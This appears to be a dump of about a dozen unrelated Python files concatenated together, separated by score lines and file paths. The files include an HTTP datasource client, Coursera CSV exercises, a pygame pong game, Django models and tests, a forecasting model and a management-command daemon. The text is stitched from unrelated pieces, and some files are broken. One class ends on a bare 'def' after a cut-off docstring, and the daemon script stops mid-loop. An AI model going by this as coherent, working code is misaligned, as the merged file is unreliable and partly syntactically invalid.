# http://www.apache.org/licenses/LICENSE-2.0
#
# This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============LICENSE_END=========================================================
import requests
from logging import getLogger
logger = getLogger(__name__)
API_VERSION = 'v2'
CONTENTS_RESOURCE = 'datasources'
class DatasourceServiceException(Exception):
    """Raised when the datasource service answers with a non-200 status.

    Attributes:
        body: raw response body returned by the service.
        status_code: HTTP status code of the failed request.
    """

    def __init__(self, body, status_code, message=None):
        self.body = body
        self.status_code = status_code
        default_message = (
            f'DatasourceServiceException: Status code: {status_code}. '
            f'Response Body: {body}'
        )
        super().__init__(default_message if message is None else message)
class DatasourceService:
    """Thin HTTP client for the Acumos datasource REST API.

    Every public method returns the raw response body as text and raises
    DatasourceServiceException for any non-200 response.
    """

    def __init__(self, endpoint, verify_ssl=True):
        """
        :param endpoint: base URL of the datasource service (no trailing slash)
        :param verify_ssl: whether to verify the server's TLS certificate
        """
        self.endpoint = endpoint
        self.headers = {
        }
        self.verify_ssl = verify_ssl

    def _request(self, method, url, data=None):
        # Shared request/validation logic for all public methods:
        # issue the call, log the status, and fail loudly on non-200.
        response = requests.request(
            method, url, data=data, headers=self.headers, verify=self.verify_ssl)
        logger.debug('Status code: {}'.format(response.status_code))
        if response.status_code != 200:
            raise DatasourceServiceException(response.text, response.status_code)
        return response.text

    def get_datasource_contents(self, datasource_key):
        """Return the contents of the datasource identified by *datasource_key*."""
        endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}/contents'
        return self._request('GET', endpoint)

    def get_datasource_details(self, datasource_key):
        """Return the details/metadata of the datasource identified by *datasource_key*."""
        endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}'
        return self._request('GET', endpoint)

    def post_write_content(self, datasource_key, request_body):
        """POST *request_body* as a prediction result for the datasource."""
        endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}/prediction'
        return self._request('POST', endpoint, data=request_body)
| 1.523438 | 2 |
Coursera/Google_IT_Automation_with_Python/02_Using_Python_to_Interact_with_the_Operating_System/Week_2/wk2_mod3_pquiz.py | ssolomon2020/Self_Study_Python_Training | 0 | 12757428 | # Specialization: Google IT Automation with Python
# Course 02: Using Python to Interact with the Operating System
# Week 2 Module Part 3 - Practice Quiz
# Student: <NAME>
# Learning Platform: Coursera.org
# Scripting examples encountered during the Module Part 3 Practice Quiz:
# 01. We're working with a list of flowers and some information about each one.
# The create_file function writes this information to a CSV file. The contents_of_file
# function reads this file into records and returns the information in a nicely formatted
# block. Fill in the gaps of the contents_of_file function to turn the data in the CSV
# file into a dictionary using DictReader.
# import os
# import csv
#
# # Create a file with data in it
# def create_file(filename):
# with open(filename, "w") as file:
# file.write("name,color,type\n")
# file.write("carnation,pink,annual\n")
# file.write("daffodil,yellow,perennial\n")
# file.write("iris,blue,perennial\n")
# file.write("poinsettia,red,perennial\n")
# file.write("sunflower,yellow,annual\n")
#
# # Read the file contents and format the information about each row
# def contents_of_file(filename):
# return_string = ""
#
# # Call the function to create the file
# create_file(filename)
#
# # Open the file
# ___
# # Read the rows of the file into a dictionary
# ___
# # Process each item of the dictionary
# for ___:
# return_string += "a {} {} is {}\n".format(row["color"], row["name"], row["type"])
# return return_string
#
# #Call the function
# print(contents_of_file("flowers.csv"))
import os
import csv
# Create a file with data in it
def create_file(filename):
    """Write a small sample CSV of flowers (header + five data rows)."""
    rows = [
        "name,color,type",
        "carnation,pink,annual",
        "daffodil,yellow,perennial",
        "iris,blue,perennial",
        "poinsettia,red,perennial",
        "sunflower,yellow,annual",
    ]
    with open(filename, "w") as file:
        file.write("\n".join(rows) + "\n")
# Read the file contents and format the information about each row
def contents_of_file(filename):
    """(Re)create the flowers CSV, read it back with DictReader, and
    return one formatted description line per data row."""
    # Call the function to create the file first.
    create_file(filename)

    formatted = []
    with open(filename, "r") as csv_file:
        # DictReader consumes the header row and keys each record by it.
        for record in csv.DictReader(csv_file):
            formatted.append(
                "a {} {} is {}\n".format(record["color"], record["name"], record["type"])
            )
    return "".join(formatted)


# Call the function
print(contents_of_file("flowers.csv"))
# 02. Using the CSV file of flowers again, fill in the gaps of the contents_of_file
# function to process the data without turning it into a dictionary. How do you skip
# over the header record with the field names?
# import os
# import csv
#
# # Create a file with data in it
# def create_file(filename):
# with open(filename, "w") as file:
# file.write("name,color,type\n")
# file.write("carnation,pink,annual\n")
# file.write("daffodil,yellow,perennial\n")
# file.write("iris,blue,perennial\n")
# file.write("poinsettia,red,perennial\n")
# file.write("sunflower,yellow,annual\n")
#
# # Read the file contents and format the information about each row
# def contents_of_file(filename):
# return_string = ""
#
# # Call the function to create the file
# create_file(filename)
#
# # Open the file
# ___
# # Read the rows of the file
# rows = ___
# # Process each row
# for row in rows:
# ___ = row
# # Format the return string for data rows only
#
# return_string += "a {} {} is {}\n".format(___)
# return return_string
#
# #Call the function
# print(contents_of_file("flowers.csv"))
import os
import csv
# Create a file with data in it
def create_file(filename):
    """Write the sample flowers CSV (header plus five data rows)."""
    with open(filename, "w") as file:
        file.writelines([
            "name,color,type\n",
            "carnation,pink,annual\n",
            "daffodil,yellow,perennial\n",
            "iris,blue,perennial\n",
            "poinsettia,red,perennial\n",
            "sunflower,yellow,annual\n",
        ])
# Read the file contents and format the information about each row
def contents_of_file(filename):
    """Create the flowers CSV, read it with csv.reader, and return one
    formatted line per data row (header excluded).

    Returns:
        str: lines like "a pink carnation is annual\n" concatenated.
    """
    return_string = ""

    # Call the function to create the file
    create_file(filename)

    # Open the file
    with open(filename, "r") as csv_file:
        reader = csv.reader(csv_file)
        # Skip the header record explicitly instead of comparing field
        # values ("name != 'name'"), which would misbehave for a row
        # whose first field happened to equal a header name.
        next(reader, None)
        # Process each data row
        for name, color, typ in reader:
            return_string += "a {} {} is {}\n".format(color, name, typ)
    return return_string


# Call the function
print(contents_of_file("flowers.csv"))
foosPong.py | sahasukanta/foosPong-repo | 0 | 12757429 | <filename>foosPong.py
import pygame
def main():
    """Initialise pygame, build the window, and run the game loop."""
    pygame.init()
    # making the main window screen
    size = (1280,720)
    screen = pygame.display.set_mode(size)
    # window title
    title = "Pong"
    pygame.display.set_caption(title)
    # window icon
    # NOTE(review): assumes pong_ball.png exists in the working directory.
    icon = pygame.image.load("pong_ball.png")
    pygame.display.set_icon(icon)
    game = Game(screen)
    game.play()
class Line:
    """A straight segment between two points, drawn on a surface."""

    def __init__(self, start, end, width, color, screen):
        # Endpoints are (x, y) pairs; width is the stroke thickness.
        self.start, self.end = start, end
        self.width, self.color = width, color
        self.screen = screen

    def draw(self):
        """Render the segment onto the owning surface."""
        pygame.draw.line(self.screen, self.color, self.start, self.end, self.width)
class Ellipse:
    """A white ellipse outline inscribed in an axis-aligned rectangle."""

    def __init__(self, rect_left, rect_top, rect_width, rect_height, screen):
        # Bounding-rectangle geometry of the ellipse.
        self.rect_left, self.rect_top = rect_left, rect_top
        self.rect_width, self.rect_height = rect_width, rect_height
        self.screen = screen

    def draw(self, width):
        """Draw the ellipse outline using the given stroke width."""
        bounding_rect = pygame.Rect(
            self.rect_left, self.rect_top, self.rect_width, self.rect_height)
        pygame.draw.ellipse(self.screen, pygame.Color("white"), bounding_rect, width)
class Paddle:
    """A rectangular player paddle that moves vertically."""

    def __init__(self, left, top, width, height, velocity, color, screen):
        # Geometry: derived edges are computed once from corner and size.
        self.left = left
        self.top = top
        self.width = width
        self.height = height
        self.bottom = top + height
        self.middle = left + width / 2
        self.right = left + width
        # Motion and rendering state.
        self.velocity = velocity
        self.color = color
        self.screen = screen

    def draw(self):
        """Draw the paddle rect onto the display (also caches self.rect)."""
        self.rect = pygame.Rect(self.left, self.top, self.width, self.height)
        pygame.draw.rect(self.screen, self.color, self.rect)

    def bound_check(self):
        """Clamp the paddle so it stays fully inside the display vertically."""
        lowest_allowed_top = self.screen.get_height() - self.height
        if self.top > lowest_allowed_top:
            self.top = lowest_allowed_top
        if self.top < 0:
            self.top = 0
class Ball:
    """The pong ball: a filled circle with a constant-speed velocity."""

    def __init__(self, dot_radius, dot_center, dot_velocity, dot_color, screen):
        self.radius = dot_radius
        self.center = dot_center
        # Horizontal extents are snapshots from construction time; they
        # are not refreshed by move().
        self.left = dot_center[0] - dot_radius
        self.right = dot_center[0] + dot_radius
        self.color = dot_color
        self.screen = screen
        self.velocity = dot_velocity

    def draw(self):
        """Draw the ball at its current center."""
        pygame.draw.circle(self.screen, self.color, self.center, self.radius)

    def move(self):
        """Advance the ball one step, reflecting off the display edges."""
        display_width, display_height = self.screen.get_size()
        # Reverse direction on whichever axis has left the display.
        if self.center[0] > display_width or self.center[0] < 0:
            self.velocity[0] *= -1
        if self.center[1] > display_height or self.center[1] < 0:
            self.velocity[1] *= -1
        # Step the center by the (possibly reflected) velocity.
        self.center[0] += self.velocity[0]
        self.center[1] += self.velocity[1]
class Game:
    """Main game class: owns all the objects, the event loop, and scoring."""

    def __init__(self, game_screen):
        """Create paddles, ball, pitch markings, and the initial state."""
        # --- attributes general to all games
        self.x_min = 0
        self.y_min = 0
        self.x_max = 1280
        self.y_max = 720
        self.screen = game_screen
        self.background_color = pygame.Color("black")
        self.game_clock = pygame.time.Clock()
        self.fps = 120
        self.continue_game = True
        self.close_clicked = False
        # creating the paddle objects (two per side, foosball style)
        left_pad_left = self.x_min + 100
        left_pad_top = self.y_min + 280
        left_pad_width = 10
        left_pad_height = 120
        left_pad_velocity = 0
        left_pad_color = pygame.Color("orangered")
        self.left_pad = Paddle(left_pad_left, left_pad_top, left_pad_width, left_pad_height, left_pad_velocity, left_pad_color, self.screen)
        left_pad_2_left = self.x_min + 300
        left_pad_2_top = self.y_min + 280
        left_pad_2_width = 10
        left_pad_2_height = 120
        left_pad_2_velocity = 0
        left_pad_2_color = pygame.Color("orangered")
        self.left_pad_2 = Paddle(left_pad_2_left, left_pad_2_top, left_pad_2_width, left_pad_2_height, left_pad_2_velocity, left_pad_2_color, self.screen)
        right_pad_left = self.x_max - 120
        right_pad_top = 280
        right_pad_width = 10
        right_pad_height = 120
        right_pad_velocity = 0
        right_pad_color = pygame.Color("chartreuse")
        self.right_pad = Paddle(right_pad_left, right_pad_top, right_pad_width, right_pad_height, right_pad_velocity, right_pad_color, self.screen)
        right_pad_2_left = 960
        right_pad_2_top = 280
        right_pad_2_width = 10
        right_pad_2_height = 120
        right_pad_2_velocity = 0
        right_pad_2_color = pygame.Color("chartreuse")
        self.right_pad_2 = Paddle(right_pad_2_left, right_pad_2_top, right_pad_2_width, right_pad_2_height, right_pad_2_velocity, right_pad_2_color, self.screen)
        # creating the ball object
        dot_radius = 5
        dot_center = [450,300]
        dot_color = pygame.Color("aquamarine")
        dot_velocity = [4,4]
        self.ball = Ball(dot_radius, dot_center, dot_velocity, dot_color, self.screen)
        # creating line objects
        midline_start = (640,0)
        midline_end = (640,720)
        midline_width = 3
        midline_color = pygame.Color("white")
        self.midline = Line(midline_start, midline_end, midline_width, midline_color, self.screen)
        # right goal lines
        right_goalline_start = (1258,280)
        right_goalline_end = (1258,400)
        right_goalline_width = 3
        right_goalline_color = pygame.Color("white")
        self.right_goalline = Line(right_goalline_start, right_goalline_end, right_goalline_width, right_goalline_color, self.screen)
        right_goalline_A_start = (1258,280)
        right_goalline_A_end = (1280,250)
        right_goalline_A_width = 3
        right_goalline_A_color = pygame.Color("white")
        self.right_goalline_A = Line(right_goalline_A_start, right_goalline_A_end, right_goalline_A_width, right_goalline_A_color, self.screen)
        right_goalline_B_start = (1258,400)
        right_goalline_B_end = (1280,430)
        right_goalline_B_width = 3
        right_goalline_B_color = pygame.Color("white")
        self.right_goalline_B = Line(right_goalline_B_start, right_goalline_B_end, right_goalline_B_width, right_goalline_B_color, self.screen)
        # left goal lines
        left_goalline_start = (20,280)
        left_goalline_end = (20,400)
        left_goalline_width = 3
        left_goalline_color = pygame.Color("white")
        self.left_goalline = Line(left_goalline_start, left_goalline_end, left_goalline_width, left_goalline_color, self.screen)
        left_goalline_A_start = (20,280)
        left_goalline_A_end = (0,250)
        left_goalline_A_width = 3
        left_goalline_A_color = pygame.Color("white")
        self.left_goalline_A = Line(left_goalline_A_start, left_goalline_A_end, left_goalline_A_width, left_goalline_A_color, self.screen)
        left_goalline_B_start = (20,400)
        left_goalline_B_end = (0,430)
        left_goalline_B_width = 3
        left_goalline_B_color = pygame.Color("white")
        self.left_goalline_B = Line(left_goalline_B_start, left_goalline_B_end, left_goalline_B_width, left_goalline_B_color, self.screen)
        # centre-circle decoration
        rect_left = 590
        rect_top = 295
        rect_width = 100
        rect_height = 100
        self.center_ellipse = Ellipse(rect_left, rect_top, rect_width, rect_height, self.screen)
        # setting initial score
        self.left_pad_score = 0
        self.right_pad_score = 0

    def handle_events(self):
        """Handle quit plus key down/up events, move and clamp the paddles."""
        for event in pygame.event.get():
            # close game event
            if event.type == pygame.QUIT:
                self.close_clicked = True
            # left pad events
            if event.type == pygame.KEYDOWN:
                # left pad 1 key down events
                if event.key == pygame.K_a:
                    self.left_pad.velocity = 4
                if event.key == pygame.K_q:
                    self.left_pad.velocity = -4
                # left pad 2 key down events
                if event.key == pygame.K_d:
                    self.left_pad_2.velocity = 4
                if event.key == pygame.K_e:
                    self.left_pad_2.velocity = -4
            if event.type == pygame.KEYUP:
                # left pad key up events
                if event.key == pygame.K_a:
                    self.left_pad.velocity = 0
                if event.key == pygame.K_q:
                    self.left_pad.velocity = 0
                # left pad 2 key up events
                if event.key == pygame.K_d:
                    self.left_pad_2.velocity = 0
                if event.key == pygame.K_e:
                    self.left_pad_2.velocity = 0
            # right pad events
            if event.type == pygame.KEYDOWN:
                # right pad key down events
                if event.key == pygame.K_l:
                    self.right_pad.velocity = 4
                if event.key == pygame.K_p:
                    self.right_pad.velocity = -4
                if event.key == pygame.K_j:
                    self.right_pad_2.velocity = 4
                if event.key == pygame.K_i:
                    self.right_pad_2.velocity = -4
            if event.type == pygame.KEYUP:
                # right pad key up events
                if event.key == pygame.K_l:
                    self.right_pad.velocity = 0
                if event.key == pygame.K_p:
                    self.right_pad.velocity = 0
                # right pad 2 key up events
                if event.key == pygame.K_j:
                    self.right_pad_2.velocity = 0
                if event.key == pygame.K_i:
                    self.right_pad_2.velocity = 0
        # both right and left pads keydown at the same time:
        # updating pad y (top) point
        self.left_pad.top += self.left_pad.velocity
        self.left_pad_2.top += self.left_pad_2.velocity
        self.right_pad.top += self.right_pad.velocity
        self.right_pad_2.top += self.right_pad_2.velocity
        # BUGFIX: the secondary paddles were never clamped, so they could
        # leave the display; bound-check all four paddles.
        self.left_pad.bound_check()
        self.left_pad_2.bound_check()
        self.right_pad.bound_check()
        self.right_pad_2.bound_check()

    def draw(self):
        """Draw every game object onto a freshly cleared frame."""
        # fill the screen with black
        self.screen.fill(self.background_color)
        # draws all game objects to screen
        self.left_pad.draw()
        self.left_pad_2.draw()
        self.right_pad.draw()
        self.right_pad_2.draw()
        self.ball.draw()
        self.midline.draw()
        self.right_goalline.draw()
        self.right_goalline_A.draw()
        self.right_goalline_B.draw()
        self.left_goalline.draw()
        self.left_goalline_A.draw()
        self.left_goalline_B.draw()
        self.center_ellipse.draw(3)
        # The display is flipped once per frame in display_score().

    def collide(self):
        """Reverse the ball's horizontal direction when it hits a paddle."""
        if self.left_pad.rect.collidepoint(self.ball.center) or self.left_pad_2.rect.collidepoint(self.ball.center):
            self.ball.velocity[0] *= -1
        if self.right_pad.rect.collidepoint(self.ball.center) or self.right_pad_2.rect.collidepoint(self.ball.center):
            self.ball.velocity[0] *= -1

    def score(self):
        """Update scores when the ball crosses either vertical edge.

        One point for reaching the opponent's edge, plus a second point
        when the ball passed through the goal mouth (y within the
        goal-line arms) — presumably goals are worth two; confirm intent.
        """
        display_width = self.screen.get_width()
        if self.ball.center[0] > display_width:
            self.left_pad_score += 1
            # Both goal mouths span the same y range (250-430).
            if self.left_goalline_A.end[1] <= self.ball.center[1] <= self.left_goalline_B.end[1]:
                self.left_pad_score += 1
        if self.ball.center[0] < 0:
            self.right_pad_score += 1
            if self.right_goalline_A.end[1] <= self.ball.center[1] <= self.right_goalline_B.end[1]:
                self.right_pad_score += 1

    def display_score(self):
        """Render both scores and flip the display buffer."""
        right_text = str(self.right_pad_score)
        left_text = str(self.left_pad_score)
        right_text_pos = (1210,25)
        left_text_pos = (30,25)
        text_color = pygame.Color("white")
        text_font = pygame.font.SysFont('freesansbold.ttf', 64)
        right_text_image = text_font.render(right_text, True, text_color)
        left_text_image = text_font.render(left_text, True, text_color)
        self.screen.blit(right_text_image, right_text_pos)
        self.screen.blit(left_text_image, left_text_pos)
        pygame.display.flip()

    def check_continue(self):
        """Stop gameplay once either player reaches the point limit (18)."""
        if self.left_pad_score >= 18 or self.right_pad_score >= 18: # point limit set to 18
            self.continue_game = False

    def update(self):
        """Advance the ball and update the score."""
        self.ball.move()
        self.score()

    def play(self):
        """Main loop: handle input, draw, score, and tick at self.fps."""
        while not self.close_clicked:
            self.handle_events()
            self.draw()
            self.display_score()
            self.check_continue() # ends gameplay automatically once a player reaches the limit
            if self.continue_game:
                self.collide()
                self.update()
            self.game_clock.tick(self.fps)
if __name__ == "__main__":
    # Run the game only when executed as a script, not on import.
    main()
| 3.5 | 4 |
tests/software_tests/message/test_nrc.py | mdabrowski1990/uds | 18 | 12757430 | <gh_stars>10-100
import pytest
from uds.message.nrc import NRC, \
ByteEnum, ValidatedEnum, ExtendableEnum
class TestNRC:
    """Unit tests for 'NRC' enum"""
    # NRC must combine byte-sized values with validation and runtime
    # extendability, hence the three mixin base classes asserted below.
    def test_inheritance__byte_enum(self):
        assert issubclass(NRC, ByteEnum)
    def test_inheritance__validated_enum(self):
        assert issubclass(NRC, ValidatedEnum)
    def test_inheritance__extendable_enum(self):
        assert issubclass(NRC, ExtendableEnum)
@pytest.mark.integration
class TestNRCIntegration:
    """Integration tests for NRC class."""
    # Value ranges that should NOT be predefined NRC members — presumably
    # the "specific conditions not correct" (0x95-0xEF) and
    # "system specific" (0xF0-0xFE) reserved ranges; confirm against spec.
    # NOTE(review): range(0xF0, 0xFF) excludes 0xFF — verify intended.
    SPECIFIC_CONDITIONS_NOT_CORRECT_VALUES = range(0x95, 0xF0)
    SYSTEM_SPECIFIC_VALUES = range(0xF0, 0xFF)
    @pytest.mark.parametrize("undefined_value", list(SPECIFIC_CONDITIONS_NOT_CORRECT_VALUES) + list(SYSTEM_SPECIFIC_VALUES))
    def test_undefined_value(self, undefined_value):
        # None of the reserved values should be recognised as members.
        assert NRC.is_member(undefined_value) is False
| 2.375 | 2 |
examples/models.py | Nielssie/django-funky-sheets | 82 | 12757431 | from django.db import models
class Genre(models.Model):
    """A movie genre; linked to Movie via a many-to-many relation."""
    name = models.CharField(max_length=16, null=True)
    def __str__(self):
        # Human-readable label used by the admin and string rendering.
        return self.name
class Director(models.Model):
    """A movie director; referenced by Movie.director (FK)."""
    name = models.CharField(max_length=64, null=True)
    def __str__(self):
        return self.name
class Country(models.Model):
    """A production country; referenced by Movie.country (FK)."""
    name = models.CharField(max_length=64, null=True)
    class Meta:
        # Avoid Django's default pluralisation "countrys".
        verbose_name_plural = 'countries'
    def __str__(self):
        return self.name
class Movie(models.Model):
    """A movie record exercising the common Django field types."""
    # String fields
    title = models.CharField(max_length=64, null=True)
    imdb_link = models.URLField(null=True)
    # Number field
    # max_digits=2 with one decimal place caps the rating at 9.9.
    imdb_rating = models.DecimalField(max_digits=2, decimal_places=1, null=True)
    # Boolean field
    parents_guide = models.BooleanField(default=False, null=True)
    # Date field
    release_date = models.DateField(null=True)
    # Relationship fields
    director = models.ForeignKey(Director, null=True, on_delete=models.CASCADE)
    country = models.ForeignKey(Country, null=True, on_delete=models.CASCADE)
    genre = models.ManyToManyField(Genre)
    def __str__(self):
        return self.title
| 2.28125 | 2 |
polecat/jsonapi/lateral/list.py | furious-luke/polecat | 4 | 12757432 | from ..list import List as ListBase
class List(ListBase):
""" Use laterals to compose a list query.
WITH ep0(included, type, id, fields) AS (
SELECT
'f',
'movies',
movies.id,
jsonb_build_array(movies.name, ep0_actors.values)
FROM movies
LIMIT 20
)
SELECT * FROM ep0
INNER JOIN LATERAL (
SELECT
't',
'people',
people.id,
jsonb_build_array(people.name, ep1_rented.values),
FROM people
WHERE people.id IN (SELECT value FROM jsonb_array_elements(
"""
    def get_sql(self):
        """Build (and memoize) the full SQL for this list query.

        Composes a CTE from the subselects followed by the main SELECT
        over the aliases; the result is cached on the instance so
        repeated calls return the same string without recomputation.
        """
        sql = getattr(self, '_sql', None)
        if not sql:
            # Aliases/subselects are stored on self for later reuse.
            self._aliases, self._subselects = self.get_components()
            cte = self.get_cte(self._subselects)
            main = self.get_main_select(self._aliases)
            sql = f'{cte} {main}'
            self._sql = sql
        return sql
def
| 3.15625 | 3 |
lintcode/medium/majority_number_iii/py/majority_number_iii.py | lilsweetcaligula/Online-Judges | 0 | 12757433 | <filename>lintcode/medium/majority_number_iii/py/majority_number_iii.py
class Solution:
    """
    @param nums: A list of integers
    @param k: As described
    @return: The majority number
    """
    def majorityNumber(self, nums, k):
        from collections import Counter

        # An element qualifies when it occurs more than (1/k) of the time.
        # Keep the exact float expression 1.0 / k * len(nums) so rounding
        # behaviour matches comparisons against integer counts.
        threshold = 1.0 / k * len(nums)
        for value, occurrences in Counter(nums).items():
            if occurrences > threshold:
                return value
        return None
| 3.59375 | 4 |
lab/tests/permissions/test_get_user_permission_group.py | betagouv/euphrosyne | 1 | 12757434 | <gh_stars>1-10
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.test.client import RequestFactory
from lab.models import Project
from ...permissions import LabRole, get_user_permission_group
class TestGetUserPermissionGroup(TestCase):
    """Checks that get_user_permission_group maps each user kind to the
    expected LabRole for a given project."""
    def setUp(self):
        # A bare GET request and one project are shared by all tests.
        request_factory = RequestFactory()
        self.request = request_factory.get("/")
        self.project = Project.objects.create(name="Test project")
    def test_get_admin_user_permission(self):
        # Lab admins always receive LAB_ADMIN.
        admin_user = get_user_model().objects.create(
            email="<EMAIL>", is_staff=True, is_lab_admin=True
        )
        self.request.user = admin_user
        assert (
            get_user_permission_group(self.request, self.project) == LabRole.LAB_ADMIN
        )
    def test_get_leader_permission(self):
        # A participant flagged as leader receives PROJECT_LEADER.
        leader_user = get_user_model().objects.create(
            email="<EMAIL>", is_staff=True
        )
        self.project.participation_set.create(user=leader_user, is_leader=True)
        self.request.user = leader_user
        assert (
            get_user_permission_group(self.request, self.project)
            == LabRole.PROJECT_LEADER
        )
    def test_get_member_permission(self):
        # A plain (non-leader) participant receives PROJECT_MEMBER.
        member_user = get_user_model().objects.create(
            email="<EMAIL>", is_staff=True
        )
        self.project.participation_set.create(user=member_user)
        self.request.user = member_user
        assert (
            get_user_permission_group(self.request, self.project)
            == LabRole.PROJECT_MEMBER
        )
    def test_get_staff_user_permission(self):
        # Staff users not participating in the project fall back to
        # ANY_STAFF_USER.
        staff_user = get_user_model().objects.create(
            email="<EMAIL>", is_staff=True
        )
        self.request.user = staff_user
        assert (
            get_user_permission_group(self.request, self.project)
            == LabRole.ANY_STAFF_USER
        )
| 2.34375 | 2 |
ros/src/tl_detector/light_classification/helper.py | Horki/CarND-Capstone | 1 | 12757435 | <filename>ros/src/tl_detector/light_classification/helper.py
import cv2
import tensorflow as tf
def load_model(model_path, graph):
    """Load a frozen TensorFlow GraphDef from *model_path* into *graph*."""
    with graph.as_default():
        graph_def = tf.GraphDef()
        # Read the serialized protobuf and import it with no name prefix.
        with tf.gfile.GFile(model_path, 'rb') as model_file:
            graph_def.ParseFromString(model_file.read())
        tf.import_graph_def(graph_def, name='')
def process_image(image):
    """Resize to 300x300 and convert BGR -> RGB for the classifier."""
    shrunk = cv2.resize(image, (300, 300))
    return cv2.cvtColor(shrunk, cv2.COLOR_BGR2RGB)
| 2.484375 | 2 |
src/urban_meal_delivery/forecasts/models/tactical/realtime.py | webartifex/urban-meal-delivery | 1 | 12757436 | """Real-time forecasting `*Model`s to predict demand for tactical purposes.
Real-time `*Model`s take order counts of all time steps in the training data
and make a prediction for only one time step on the day to be predicted (i.e.,
the one starting at `predict_at`). Thus, the training time series have a
`frequency` of the number of weekdays, `7`, times the number of time steps on a
day. For example, for 60-minute time steps, the `frequency` becomes `7 * 12`
(= operating hours from 11 am to 11 pm), which is `84`. Real-time `*Model`s
train the forecasting `methods` on a seasonally decomposed time series internally.
""" # noqa:RST215
import datetime as dt
import pandas as pd
from urban_meal_delivery import db
from urban_meal_delivery.forecasts import methods
from urban_meal_delivery.forecasts.models import base
class RealtimeARIMAModel(base.ForecastingModelABC):
    """The ARIMA model applied on a real-time time series."""

    name = 'rtarima'

    def predict(
        self, pixel: db.Pixel, predict_at: dt.datetime, train_horizon: int,
    ) -> pd.DataFrame:
        """Predict demand for a time step.

        Args:
            pixel: pixel in which the prediction is made
            predict_at: time step (i.e., "start_at") to make the prediction for
            train_horizon: weeks of historic data used to predict `predict_at`

        Returns:
            actual order counts (i.e., the "actual" column),
            point forecasts (i.e., the "prediction" column), and
            confidence intervals (i.e, the four "low/high/80/95" columns);
            contains one row for the `predict_at` time step

        # noqa:DAR401 RuntimeError
        """
        # Generate the historic (and real-time) order time series.
        training_ts, frequency, actuals_ts = self._order_history.make_realtime_ts(
            pixel_id=pixel.id, predict_at=predict_at, train_horizon=train_horizon,
        )

        forecast_interval = pd.DatetimeIndex(actuals_ts.index)

        # Split the `training_ts` into a seasonal and a seasonally
        # adjusted part so that each can be predicted separately.
        decomposed = methods.decomposition.stl(
            time_series=training_ts,
            frequency=frequency,
            # "Periodic" `ns` parameter => same seasonal component value
            # for observations of the same lag.
            ns=999,
        )

        # The seasonal component is forecast by linear extrapolation ...
        season = methods.extrapolate_season.predict(
            training_ts=decomposed['seasonal'],
            forecast_interval=forecast_interval,
            frequency=frequency,
        )['prediction']

        # ... whereas ARIMA handles the seasonally adjusted observations.
        adjusted = methods.arima.predict(
            training_ts=decomposed['trend'] + decomposed['residual'],
            forecast_interval=forecast_interval,
            # Because the seasonality was taken out before,
            # the `training_ts` has, by definition, a `frequency` of `1`.
            frequency=1,
            seasonal_fit=False,
        )

        # The overall predictions add both parts together. The linear
        # extrapolation has no confidence interval of its own, so the
        # ARIMA intervals are shifted by the extrapolated season.
        predictions = pd.DataFrame(
            data={
                'actual': actuals_ts,
                'prediction': season + adjusted['prediction'],
                'low80': season + adjusted['low80'],
                'high80': season + adjusted['high80'],
                'low95': season + adjusted['low95'],
                'high95': season + adjusted['high95'],
            },
            index=actuals_ts.index,
        )

        # Sanity checks.
        if len(predictions) != 1:  # pragma: no cover
            raise RuntimeError('real-time models should predict exactly one time step')
        if predictions.isnull().sum().any():  # pragma: no cover
            raise RuntimeError('missing predictions in rtarima model')
        if predict_at not in predictions.index:  # pragma: no cover
            raise RuntimeError('missing prediction for `predict_at`')

        return predictions
| 3.46875 | 3 |
scripts/management_daemon.py | uw-it-aca/django-container | 0 | 12757437 | #!/usr/bin/env python
import django
from django.core import management
from prometheus_client import start_http_server, Gauge
from croniter import croniter
from datetime import datetime
import time
import sys
import signal
import os
import re
import gc
#
# Run django management command on a continuous loop
# delaying "--delay <seconds>" between each invocation,
# and gracefully exiting on termination signal
#
def main():
    """Run a Django management command in a loop, exporting Prometheus metrics.

    Usage: daemon [--delay <seconds> | --cron <spec>] [--] <command> [options...]

    Runs <command> repeatedly, pausing between invocations either a fixed
    number of seconds (--delay, default 15) or until the next cron slot
    (--cron).  Start/finish/duration/exit metrics are exported on port 9100,
    and the loop exits gracefully on common termination signals.
    """
    signals = [signal.SIGHUP, signal.SIGINT, signal.SIGQUIT,
               signal.SIGTERM, signal.SIGWINCH]
    finish_signal = None
    loop_delay = 15
    cron_spec = None
    command = None
    options = []
    our_arg = True

    def report(message, error=False):
        """Log a message tagged with the wrapped command name."""
        print("management command daemon: {}: {}".format(
            command if command else sys.argv[1:], message),
            file=sys.stderr if error else sys.stdout)

    def abort(reason):
        """Report a fatal error and exit with a failure status."""
        report(reason, error=True)
        sys.exit(-1)

    def finish_on_signal():
        report("exit on signal ({})".format(finish_signal))
        sys.exit(0)

    def handler(signum, frame):
        # Just record the signal; the main loop exits at the next safe point
        # so a running management command is never killed mid-flight.
        nonlocal finish_signal
        if signum in signals:
            finish_signal = signum
        else:
            report("signal {}".format(signum), error=True)

    def pause(lastrun_utc):
        """Sleep until the next scheduled run (next cron slot or fixed delay)."""
        delay = 0
        if cron_spec:
            c = croniter(cron_spec, datetime.utcfromtimestamp(lastrun_utc + 1))
            delay = int(c.get_next() - lastrun_utc)
        else:
            # account for how long the command itself took
            delay = loop_delay - int(time.time() - lastrun_utc)

        if delay > 0 and not finish_signal:
            gc.collect()
            time.sleep(delay)

    # prepare to exit gracefully
    for signum in signals:
        signal.signal(signum, handler)

    # prepare metrics
    management_daemon_command_start = Gauge(
        'management_daemon_command_start',
        'Management Command start time',
        ['job', 'instance'])
    management_daemon_command_finish = Gauge(
        'management_daemon_command_finish',
        'Management Command finish time',
        ['job', 'instance'])
    management_daemon_command_duration = Gauge(
        'management_daemon_command_duration',
        'Management Command curation',
        ['job', 'instance'])
    management_daemon_command_exit = Gauge(
        'management_daemon_command_exit',
        'Management Command return value',
        ['job', 'instance'])

    # parse our args from command's; `loop_delay is None` / `cron_spec == ""`
    # mark that the previous argument was --delay / --cron respectively
    for arg in sys.argv[1:]:
        if our_arg:
            if not loop_delay:
                if not re.match('^[0-9]+$', arg):
                    abort('invalid loop delay')

                loop_delay = int(arg)
            elif cron_spec is not None and len(cron_spec) == 0:
                if not croniter.is_valid(arg):
                    abort("invalid cron specification")

